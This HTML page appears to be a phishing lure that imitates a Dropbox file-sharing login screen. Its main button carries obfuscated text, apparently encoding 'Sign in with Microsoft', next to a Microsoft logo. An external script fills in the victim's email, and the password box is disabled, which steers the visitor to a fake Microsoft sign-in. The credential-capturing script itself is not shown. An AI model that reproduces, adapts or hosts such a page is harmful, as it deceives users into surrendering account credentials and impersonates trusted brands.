<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="./w3.css">
</head>

<body style="background-color: rgb(160, 156, 150);">
    <style>
        * {
            margin: 0;
            padding: 0;
            border: 0;
            outline: 0;
            font-size: 100%;
            vertical-align: baseline;
            background: transparent;
            font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
        }
    </style>
    <div style="height: 100vh; width: 240px; background-color: rgb(224, 221, 215); position: absolute;">
        <svg viewBox="0 0 136 136" fill="none" role="presentation" focusable="false" width="160" height="160"
            class="dig-ContentIcon dig-ContentIcon--large" data-testid="FolderBaseDefaultLarge">
            <path
                d="M57.561 36.184c.465.928 1.163 1.795 1.798 2.429.805.803 2.023 1.387 3.698 1.387H116.5v57.13c-.144 2.681-.713 5.228-2.683 7.193-1.805 1.801-4.425 2.677-7.709 2.677H30.892c-3.284 0-5.904-.876-7.709-2.677-1.805-1.801-2.683-4.414-2.683-7.69V29l30.408.003c1.691.054 3.196.814 4.163 2.214l2.49 4.967Z"
                fill="var(--dig-color__foldericon__shadow, #75aaff)"></path>
            <path
                d="M57.561 36.184c.465.928 1.163 1.795 1.798 2.429.805.803 2.023 1.387 3.698 1.387H116.5v56.13c-.144 2.681-.713 5.228-2.683 7.193-1.805 1.801-4.425 2.677-7.709 2.677H30.892c-3.284 0-5.904-.876-7.709-2.677-1.805-1.801-2.683-4.414-2.683-7.69V29l30.408.003c1.691.054 3.196.814 4.163 2.214l2.49 4.967Z"
                fill="var(--dig-color__foldericon__container, #a0c4ff)"></path>
        </svg>
        <div
            style="line-height: 40px; font-size: 17px; letter-spacing: 0.5px; color: rgba(0, 0, 0, 0.734); margin-left: 42px; margin-top: -30px;">
            <p style="color: black;">All files</p>
            <p>Photos</p>
            <p>Shared</p>
            <p>File requests</p>
            <p>Deleted files</p>
        </div>
    </div>
    <div style="height: 100vh; position: absolute;
    background-color: rgba(255, 255, 255, 0.64); width: 100%;">

    </div>
    <div style="
        background: #fff;
        width: calc(100% - 630px);
        min-width: 500px;
        padding: 55px 90px;
        margin: auto;
          margin-bottom: auto;
        position: relative;
        top: 55px;
        margin-bottom: 80px;
        min-height: 450px;
        display: flex;
        justify-content: center;
        box-shadow: 0 0 0 1px rgba(99,114,130,0.16),0 8px 16px rgba(27,39,51,0.08);">
        <div>
            <p style="font-size: 24px; color: rgba(0, 0, 0, 0.734); text-align: center;">Welcome back</p>

            <style>
                #login-btn:hover {
                    background-color: #000;
                    color: white;
                }

                #login-btn {
                    display: flex;
                    width: 100%;
                    border: 1px solid rgba(39, 39, 39, 0.474);
                    padding: 8px 46px;
                    background-color: transparent;
                    color: rgba(0, 0, 0, 0.837);
                    cursor: pointer;
                    text-align: center;
                    align-items: center;
                    justify-content: center;
                    font-size: 14px;
                    margin: 27px 0px 16px;
                }

                #login-btn-2 {
                    background-color: rgb(23, 112, 255);
                    color: white;
                    text-align: center;
                    padding: 18px;
                    border-radius: 16px;
                    margin-top: 32px;
                    width: 100%;
                }

                #login-btn-2:hover {
                    background-color: rgb(0, 98, 255);
                    cursor: pointer;
                }
            </style>
            <div style="margin-top: 80px; text-align: center; line-height: 30px;">
                <button id="login-btn">
                    <img id="lgImg" src="/primary/images/msf.svg" style="margin: 0px 8px; width: 10%;" />OBFS==Adm92cvJ3Yp1EIoRXa3BibpBibnl2UEND
                    <svg class="pointer" width="20" viewBox="0 0 26 26" fill="none" xmlns="http://www.w3.org/2000/svg"
                        style="margin: 0px 4px 0px">
                        <path
                            d="M22.375 12.5437C22.375 13.1909 21.8503 13.7156 21.2031 13.7156L4.79687 13.7156C4.14967 13.7156 3.625 13.1909 3.625 12.5437C3.625 11.8965 4.14966 11.3718 4.79687 11.3718L21.2031 11.3718C21.8503 11.3718 22.375 11.8965 22.375 12.5437Z"
                            fill="rgb(0,0,0, 0.7)"></path>
                        <path
                            d="M12.1714 21.5755C11.7137 21.1178 11.7137 20.3758 12.1714 19.9182L19.5458 12.5437L12.1714 5.16922C11.7137 4.71157 11.7137 3.96958 12.1714 3.51194C12.629 3.05429 13.371 3.05429 13.8286 3.51194L22.0318 11.7151C22.4894 12.1727 22.4894 12.9147 22.0318 13.3723L13.8286 21.5755C13.371 22.0331 12.629 22.0331 12.1714 21.5755Z"
                            fill="rgb(0,0,0, 0.7)"></path>
                    </svg>
                </button>

                <div style="display: flex; justify-content: center;">
                    <div style="border-bottom: 1px solid rgba(0, 0, 0, 0.226); width: 150px;"></div>
                    <div style="margin: 0px 16px -13px;">or</div>
                    <div style="border-bottom: 1px solid rgba(0, 0, 0, 0.226); width: 150px;"></div>
                </div>
                <div style="margin-top: 32px;">
                    <p>Log in using</p>
                    <p id="email"></p>

                </div>
                <div style="text-align: left; margin-top: 18px;">
                    <div style="font-size: 12px; color: rgba(0, 0, 0, 0.601);">
                        Password
                    </div>
                    <input type="text" name="" id=""
                        style="border: 0.5px solid rgba(0, 0, 0, 0.389); width: 95%; padding: 12px;" disabled>
                    <div style="font-size: 12px; color: rgba(23, 112, 255); margin-top: 8px;">
                        Forgot your password?
                    </div>
                    <button id="login-btn-2">
                        Log in
                    </button>
                </div>
            </div>
        </div>
    </div>
    </div>
    <script src="/primary/script.js"></script>
</body>

</html>